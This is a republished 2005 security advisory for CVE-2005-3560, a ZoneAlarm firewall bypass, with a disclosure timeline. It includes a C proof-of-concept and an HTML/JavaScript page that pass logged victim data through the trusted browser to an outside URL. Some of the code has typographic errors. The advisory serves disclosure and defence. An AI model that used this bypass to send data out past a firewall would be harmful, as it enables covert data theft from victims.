‘Zone Labs ShowHTMLDialog Bypassing Vulnerability’

Summary

Zone Alarm Pro and Internet Security Suite are firewall programs for Microsoft Windows.’

By exploiting Zone Lab’s trust in certain web based programs, malicious programs can bypass Zone Alarm Pro and Internet Security Suite protection and send information about the system to attackers.’

Credit:

‘The information has been provided by Debasis Mohanty.
The original article can be found at: http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html


Details

Vulnerable Systems:
 * Zone Alarm Pro version 6.0.x
 * Zone Alarm Internet Security Suit version 6.0.x
 * Zone Alarm Firewall with Anti-Spyware version 6.1.x
 * Zone Alarm Firewall with Anti-Virus version 6.0.x
 * Zone Alarm Firewall (Free Version) version 6.0.x

Zone Alarm products with Advance Program Control or OS Firewall Technology enabled, detects and blocks almost all those APIs (like Shell, ShellExecuteEx, SetWindowText, SetDlgItem etc) which are commonly used by malicious programs to send data via http by piggybacking over other trusted programs. However, it is still possible for a malicious program (Trojans or worms etc) to make outbound connections to the evil site by piggybacking over trusted Internet browser using ‘HTML Modal Dialog’ in conjunction with simple ‘JavaScript’. Here it is assumed that the default browser (IE or Firefox etc) has authorization to access internet. In case of the default installation of ZoneAlarm Pro, IE is by default allowed to access internet.

By using ShowHTMLDialog() method, it is possible for any malicious program to create a modal dialog box that displays HTML. This in turn can be used to redirect the page to the attacker’s site. It is observed that using this method, ZA Pro and Internet Security Suit is unable to block internet access. This method can be used by any malicious program to send data outside via http to the attacker and at the same time it can also receive the command instructions from the attacker.

On successful exploitation the malicious program will be able to send the victim’s details and personal system information to the attacker and this can further leads to complete system compromise.

Proof of-Concept:
osfwbypass-demo.c:
BOOL LoadHtmlDialog(void)
{
HINSTANCE hinstMSHTML = LoadLibrary(TEXT(‘MSHTML.DLL’));

if (hinstMSHTML)
{
   SHOWHTMLDIALOGFN* pfnShowHTMLDialog;

// Open a Modal Dialog box of HTML content type
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML, TEXT(‘ShowHTMLDialog’));

if (pfnShowHTMLDialog)
{
   IMoniker *pURLMoniker;

// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(L’c:\modal-dialog.htm’);
CreateURLMoniker(NULL, bstrURL, &pURLMoniker);

if (pURLMoniker)
{
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
pURLMoniker->Release();
}

SysFreeString(bstrURL);
}

FreeLibrary(hinstMSHTML);
}

Return True;
}
/* Eof */

modal-dialog.htm:
< html>
< head>
< meta http-equiv=’Content-Language’ content=’en-us’>
< title>Redirection Dialog< / title>

< script language=’JavaScript’>

< ! – – Here goes the information logged by the malicious program which will
be sent to the evil site via http request –>
var sTargetURL = ‘http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[YourInformation Here] window.location.href = sTargetURL;
window.close;
< / script>

< / head>
< / html>

CVE Information:
CVE-2005-3560

Disclosure Timeline:
10th Oct, 2005 – Bug Originally Discovered
15th Oct, 2005 – Vendor Reported
15th Oct, 2005 – Vendor acknowledged the report
17th Oct, 2005 – Vendor asked for more information
19th Oct, 2005 – Vendor provided with more information and the version info on which the exploit was tested.
29th Oct, 2005 – Final follow up with the vendor but no response
8th Nov, 2005 – Public Disclosure’

Categories: Windows